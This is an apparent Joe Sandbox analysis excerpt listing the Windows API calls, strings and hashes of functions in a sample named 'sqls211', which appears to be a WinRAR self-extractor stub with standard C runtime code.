                                                                                                            • Instruction Fuzzy Hash: D2715D71A00619AFDB14DFA5CC99EBEBBB9FF48714B14015DE512A72A0CB30AE41CB61
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC9387
                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CC93AA
                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CC93C9
                                                                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                                                                            • _swprintf.LIBCMT ref: 00CC9465
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC94D4
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC9514
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                            • String ID: rtmp%d
                                                                                                            • API String ID: 3726343395-3303766350
                                                                                                            • Opcode ID: f4edf188532ff95fa57f3f7b43c711f18b157972e478a56f7e0119ca8ec29451
                                                                                                            • Instruction ID: 11261bda344177604be83e9edff758fa901511ead7602192c3cf0be925ba0a13
                                                                                                            • Opcode Fuzzy Hash: f4edf188532ff95fa57f3f7b43c711f18b157972e478a56f7e0119ca8ec29451
                                                                                                            • Instruction Fuzzy Hash: C14156B190025866DF21FBA0CC49FEE737CEF45340F0449A9F659E3551DA388B89EB60
                                                                                                            APIs
                                                                                                            • __aulldiv.LIBCMT ref: 00CD122E
                                                                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CD1251
                                                                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CD1263
                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CD1274
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1284
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1294
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CD12CF
                                                                                                            • __aullrem.LIBCMT ref: 00CD1379
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1247370737-0
                                                                                                            • Opcode ID: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                                                                            • Instruction ID: 3af096e8fa9b8c7c418f5ad2374f8de2ab11cfc964b4419aa5790d9614b02da0
                                                                                                            • Opcode Fuzzy Hash: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                                                                            • Instruction Fuzzy Hash: 2341FAB1508345AFC710DF65C884A6FBBE9FF88714F04892EF996C2610E734E649DB52
                                                                                                            APIs
                                                                                                            • _swprintf.LIBCMT ref: 00CC2536
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                            • API String ID: 3053425827-2277559157
                                                                                                            • Opcode ID: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
                                                                                                            • Instruction ID: bd91396eb8300915779c9058e1ec88604a07e9299aa538cc05306b0cc441069c
                                                                                                            • Opcode Fuzzy Hash: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
                                                                                                            • Instruction Fuzzy Hash: 6EF116716083809BDB25EF28C4E5FFE77996F90300F08056DFD8A9B283CB649A45D762
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                                                                            • API String ID: 176396367-3568243669
                                                                                                            • Opcode ID: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                                                                            • Instruction ID: 6ff7ba4a208aa532897f291575f68526f314e0ada4a5112e245f6565554f92b2
                                                                                                            • Opcode Fuzzy Hash: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                                                                            • Instruction Fuzzy Hash: F551046E74032295DB30AA259811777B3E2DFA5750F68042BFFD18B7C0FB758E818261
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CEFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00CEF6CF
                                                                                                            • __fassign.LIBCMT ref: 00CEF74A
                                                                                                            • __fassign.LIBCMT ref: 00CEF765
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CEF78B
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7AA
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7E3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: 2a9c828e204fb14311206ed8eb980df6df02dcd8cb45e5a5b1f33960d7fe2b4f
                                                                                                            • Instruction ID: a59308952565a12aad10b89e7d33d016f83caa2b6081c8ab4881ef758cc7ecbd
                                                                                                            • Opcode Fuzzy Hash: 2a9c828e204fb14311206ed8eb980df6df02dcd8cb45e5a5b1f33960d7fe2b4f
                                                                                                            • Instruction Fuzzy Hash: BC5195B1900289AFDB10CFA5DC55BEEBBF4EF09300F14416EE555E7291D630AA42CBA1
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2937
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE293F
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE29C8
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE29F3
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2A48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                                                                            • Instruction ID: a4af6e600449a7f7ed2bdb41fd1e18e2add349fdd0cd8f94d7abb16488d73d64
                                                                                                            • Opcode Fuzzy Hash: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                                                                            • Instruction Fuzzy Hash: F141DB30A00288AFCF10DF6AC885BAE7BB9EF44314F148065E9159B393D771DA41DF91
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00CD9EEE
                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00CD9F44
                                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00CD9FDB
                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00CD9FE3
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00CD9FF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$RectText
                                                                                                            • String ID: RarHtmlClassName
                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                            • Opcode ID: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                                                                            • Instruction ID: fdb64cb1e31c66fde1bc8965ee3f7b0f7c71133d067d59caa11f01cad1c1a818
                                                                                                            • Opcode Fuzzy Hash: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                                                                            • Instruction Fuzzy Hash: BA41D331004310EFCB225FA5DC48B6B7BA8FF58701F00455AFA4AEA256DB38EA15CF65
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                            • API String ID: 176396367-3743748572
                                                                                                            • Opcode ID: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                                                                            • Instruction ID: 1ff2ea22f4cf5efc82f011bcce338f0387091c0f87963ce3996e2f9bdf295120
                                                                                                            • Opcode Fuzzy Hash: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                                                                            • Instruction Fuzzy Hash: 4031903B64438556D634AB919C42B7B73A4EB90320F50442FF69E87380FB70BF4093A5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CEC868: _free.LIBCMT ref: 00CEC891
                                                                                                            • _free.LIBCMT ref: 00CEC8F2
                                                                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34), ref: 00CE8DE2
                                                                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(00CF3A34,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34,00CF3A34), ref: 00CE8DF4
                                                                                                            • _free.LIBCMT ref: 00CEC8FD
                                                                                                            • _free.LIBCMT ref: 00CEC908
                                                                                                            • _free.LIBCMT ref: 00CEC95C
                                                                                                            • _free.LIBCMT ref: 00CEC967
                                                                                                            • _free.LIBCMT ref: 00CEC972
                                                                                                            • _free.LIBCMT ref: 00CEC97D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                            • Instruction ID: b4fb0e72a834beba8870529c639b8cc0ee1e0faa0912b0e4b778991724d002cc
                                                                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                            • Instruction Fuzzy Hash: D7112171580B85AAE530B7B3CD87FCB7BAC9F04B00F444C15B29D660D2DA75B60AA750
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CDE669,00CDE5CC,00CDE86D), ref: 00CDE605
                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CDE61B
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CDE630
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                            • API String ID: 667068680-1718035505
                                                                                                            • Opcode ID: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                                                                            • Instruction ID: 0c8afae9adf286ae41dfca87cd5aa24d4de1476f1ccda640d61e119ad1813283
                                                                                                            • Opcode Fuzzy Hash: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                                                                            • Instruction Fuzzy Hash: 70F0C23978166AAB0B216E765C8467A62C86A35755300443BFB15DB300EB10CE57AAA1
                                                                                                            APIs
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD14C2
                                                                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CD14E6
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CD1500
                                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CD1513
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1523
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1533
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2092733347-0
                                                                                                            • Opcode ID: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                                                                            • Instruction ID: 116a628425041425fae7ddcb19d7b4dcb8f64720a2af96792425fd5eeeea57a0
                                                                                                            • Opcode Fuzzy Hash: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                                                                            • Instruction Fuzzy Hash: E131D775108345ABC704DFA8D884A9FB7E8BF98714F048A1EF995C3210E734D649CBA6
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B08
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE2B16
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2B2F
                                                                                                            • SetLastError.KERNEL32(00000000,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                                                                            • Instruction ID: 079c0443349c9c496cb619b606790b09eab38698aeb6d253791013228af8ced5
                                                                                                            • Opcode Fuzzy Hash: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                                                                            • Instruction Fuzzy Hash: 0201D4321183926FA6242B777C89B3A2B9EEB51774760073AF121560F0EF956E00E545
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                                                                            • _free.LIBCMT ref: 00CE981C
                                                                                                            • _free.LIBCMT ref: 00CE9844
                                                                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE9851
                                                                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                                                                            • _abort.LIBCMT ref: 00CE9863
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: 528a79b599acde398c730c46c4288a669e85551b2c82edbdafbfb66650d9105d
                                                                                                            • Instruction ID: ea1a8d7c2134f078e651f7c6badbd51e0ce989989c0fbf7f7ee3aad15ccbee66
                                                                                                            • Opcode Fuzzy Hash: 528a79b599acde398c730c46c4288a669e85551b2c82edbdafbfb66650d9105d
                                                                                                            • Instruction Fuzzy Hash: EEF0A4361406D266C73233277C0AB3F2A69DFD2775F250125F528921F2EE348A05D566
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC47
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDDC61
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDDC72
                                                                                                            • TranslateMessage.USER32(?), ref: 00CDDC7C
                                                                                                            • DispatchMessageW.USER32(?), ref: 00CDDC86
                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
